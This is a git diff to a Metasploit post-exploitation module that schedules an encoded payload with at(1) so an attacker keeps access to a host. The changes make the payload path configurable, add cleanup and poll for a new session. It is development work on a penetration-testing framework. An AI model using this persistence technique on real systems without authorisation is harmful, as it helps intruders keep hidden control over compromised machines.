diff --git a/modules/exploits/multi/local/at_persistence.rb b/modules/exploits/multi/local/at_persistence.rb index dd41d43369..e7b6d21eaa 100644 --- a/modules/exploits/multi/local/at_persistence.rb +++ b/modules/exploits/multi/local/at_persistence.rb @@ -16,6 +16,7 @@ class MetasploitModule < Msf::Exploit::Local info, 'Name' => 'at(1) Persistence', 'Description' => %q( + This module achieves persisience by executing payloads via at(1). ), 'License' => MSF_LICENSE, 'Author' => @@ -42,7 +43,13 @@ class MetasploitModule < Msf::Exploit::Local register_options( [ OptString.new('TIME', [false, 'When to run job via at(1). Changing may require WfsDelay to be adjusted', 'now + 1 minute']), - OptBool.new('CLEANUP', [true, 'Delete at entry and payload after execution', true]) + OptBool.new('CLEANUP', [true, 'Delete payload after execution', true]) + ] + ) + + register_advanced_options( + [ + OptString.new('PATH', [false, 'Path to store payload to be executed by at(1). Leave unset to use mktemp']) ] ) end @@ -56,14 +63,26 @@ class MetasploitModule < Msf::Exploit::Local end end + def cmd_exec(cmd) + super("PATH=/bin:/usr/bin:/usr/local/bin #{cmd}") + end + def exploit unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NoAccess, 'User denied cron via at.deny') end - write_file("/tmp/test.sh", payload.encoded) - cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}") + unless payload_file = datastore['PATH'] || cmd_exec('mktemp') + fail_with(Failure::BadConfig, 'Unable to find suitable location for payload') + end + + write_file(payload_file, payload.encoded) + cmd_exec("at -f #{payload_file} #{datastore['TIME']}") + register_files_for_cleanup(payload_file) if datastore['CLEANUP'] print_status("Waiting #{datastore['WfsDelay']}sec for execution") - Rex.sleep(datastore['WfsDelay'].to_i) + 0.upto(datastore['WfsDelay'].to_i) do + Rex.sleep(1) + break if session_created? + end end end